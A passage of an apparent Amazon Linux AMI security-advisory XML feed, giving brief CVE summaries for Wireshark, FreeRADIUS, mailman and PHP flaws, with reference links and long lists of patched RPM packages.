Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8714:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8713:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8712:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8711:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-8710:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8710" title="" id="CVE-2014-8710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8711" title="" id="CVE-2014-8711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8712" title="" id="CVE-2014-8712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8713" title="" id="CVE-2014-8713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8714" title="" id="CVE-2014-8714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0562" title="" id="CVE-2015-0562" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0564" title="" id="CVE-2015-0564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2189" title="" id="CVE-2015-2189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2191" title="" id="CVE-2015-2191" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1460.html" title="" id="RHSA-2015:1460" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="17.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-17.19.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="17.19.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-17.19.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="17.19.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-17.19.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="17.19.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-17.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-581</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-581: medium priority package update for freeradius</title><issued date="2015-08-17 12:30:00" /><updated date="2015-08-17 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2015:
A stack-based buffer overflow was found in the way the FreeRADIUS rlm_pap module handled long password hashes. An attacker able to make radiusd process a malformed password hash could cause the daemon to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2015" title="" id="CVE-2014-2015" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1287.html" title="" id="RHSA-2015:1287" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-utils" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="4.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-4.15.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-4.15.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="4.15.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-4.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-582</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-582: medium priority package update for mailman</title><issued date="2015-08-17 12:31:00" /><updated date="2015-08-17 12:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2775:
It was found that mailman did not sanitize the list name before passing it to certain MTAs. A local attacker could use this flaw to execute arbitrary code as the user running mailman.
CVE-2002-0389:
It was found that mailman stored private email messages in a world-readable directory. A local user could use this flaw to read private mailing list archives.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389" title="" id="CVE-2002-0389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2775" title="" id="CVE-2015-2775" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1417.html" title="" id="RHSA-2015:1417" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailman-debuginfo" version="2.1.15" release="21.20.amzn1" epoch="3" arch="x86_64"><filename>Packages/mailman-debuginfo-2.1.15-21.20.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="21.20.amzn1" epoch="3" arch="x86_64"><filename>Packages/mailman-2.1.15-21.20.amzn1.x86_64.rpm</filename></package><package name="mailman" version="2.1.15" release="21.20.amzn1" epoch="3" arch="i686"><filename>Packages/mailman-2.1.15-21.20.amzn1.i686.rpm</filename></package><package name="mailman-debuginfo" version="2.1.15" release="21.20.amzn1" epoch="3" arch="i686"><filename>Packages/mailman-debuginfo-2.1.15-21.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-583</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-583: medium priority package update for php54</title><issued date="2015-08-17 12:39:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pspell" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.44-1.72.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.44-1.72.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.44" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.44-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-584</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-584: medium priority package update for php55</title><issued date="2015-08-17 12:41:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6833:
A flaw was found in the way the way PHP&#039;s Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened.
1283702:
CVE-2015-6833 php: Files from archive can be extracted outside of destination directory using phar
CVE-2015-6832:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256322:
CVE-2015-6832 php: dangling pointer in the unserialization of ArrayObject items
CVE-2015-6831:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1256290:
CVE-2015-6831 php: Use After Free Vulnerability in unserialize()
CVE-2015-5590:
1245242:
CVE-2015-5590 php: buffer overflow and stack smashing error in phar_fix_filepath
CVE-2015-5589:
1245236:
CVE-2015-5589 php: segmentation fault in Phar::convertToData on invalid file
CVE-2015-3152:
1217506:
CVE-2015-3152 mysql: use of SSL/TLS can not be enforced in mysql client library (oCERT-2015-003, BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3152" title="" id="CVE-2015-3152" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5589" title="" id="CVE-2015-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5590" title="" id="CVE-2015-5590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6831" title="" id="CVE-2015-6831" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6832" title="" id="CVE-2015-6832" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6833" title="" id="CVE-2015-6833" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-xmlrpc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.28" release="1.106.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.28-1.106.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.28" release="1.106.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.28-1.106.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.28" release="1.106.amzn1" epoch="0" 